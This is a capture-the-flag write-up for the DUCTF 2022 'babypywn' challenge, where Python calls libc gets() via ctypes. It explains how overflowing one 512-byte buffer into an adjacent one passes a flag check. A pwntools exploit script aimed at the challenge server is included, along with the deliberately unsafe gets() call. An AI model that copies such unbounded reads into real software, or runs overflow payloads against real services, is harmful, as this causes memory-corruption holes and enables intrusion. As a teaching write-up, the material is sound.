Rating:

The task text reads:
Python is memory safe, right?
An we are given the following python file.
```python
#!/usr/bin/env python3

from ctypes import CDLL, c_buffer
libc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
buf1 = c_buffer(512)
buf2 = c_buffer(512)
libc.gets(buf1)
if b'DUCTF' in bytes(buf2):
print(open('./flag.txt', 'r').read())
```
The c_buffer ```buf1``` is used to store the input that we can provide in ```libc.gets(buf1)```.
As the buffer ```buf2``` is allocates memory in the section following ```buf1``` we can write more than the expected 512 bytes into ```buf1``` to leak into ```buf2```. The condition expects ```buf2``` to contain the bytestring ```b'DUCTF'```, which we will append to our 512 bytes that are filling up ```buf1```.
To execute this exploit we employ the pwntools python library.
First we attach to the remote process:
```python
from pwn import *
#io = process(['./babypywn.py'])
io = remote('2022.ductf.dev', 30021)
```
Then we build our 512 bytes long filler bytestring to fill ```buf1```.
```python
filler = ''.join(['a' for x in range(512)])
b_filler = bytes(filler, 'utf-8')
```
Finally we add the expected ```b'DUCTF'``` bytestring which leaks into ```buf2``` to our filler and send this payload to the attached remote process.
```python
io.sendline(b_filler+b'DUCTF')
io.recvline()
```
The ```io.recvline()``` reads output from the attached process and prints the flag.